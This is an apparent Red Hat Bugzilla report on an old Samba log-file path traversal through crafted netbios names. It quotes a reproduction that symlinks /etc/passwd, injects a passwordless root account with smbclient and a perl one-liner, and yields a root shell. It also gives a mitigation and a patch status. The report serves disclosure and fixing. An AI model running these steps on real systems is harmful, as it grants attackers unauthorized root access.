From Bugzilla Helper: User-Agent: Mozilla/4.77 [en] (X11; U; Linux 2.2.19-6.2.1 i686) Description of problem: RHAT Samba config contains log file = /var/log/samba/%m.log By using unexpected values for netbios names, attackers can create new .log files, or, using sym links, can append to existing files (/etc/passwd?). Michal Zalewski, who reported the bug on Bugtraq (and, apparently, to the Samba team), also reports that the default Samba line of log file = /var/log/samba/log.%m may allow attackers to connect with invlid names containing "/" characters, and evade logging. How reproducible: Always Steps to Reproduce: (from Michal's report) 1. ln -s /etc/passwd /tmp/x.log 2. smbclient //NIMUE/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" -n ../../../tmp/x -N ...where 'NIMUE' stands for local host name (few error messages should be returned). 3. su toor Actual Results: root shell Expected Results: user "toor" should not exist Additional info: Preferred configuration, until Samba releases a patch, is log file = /var/log/samba/%I.log or log file = /var/log/samba/log.%I which will make Smaba log by IP address, avoiding the "../" netbios name attacks.
Updated (2.0.10) rpms for all releases, all architectures are currently in testing.
2.2.10 was released yesterday as a security errata for RHL 5.2, 6.2, 7 and 7.1.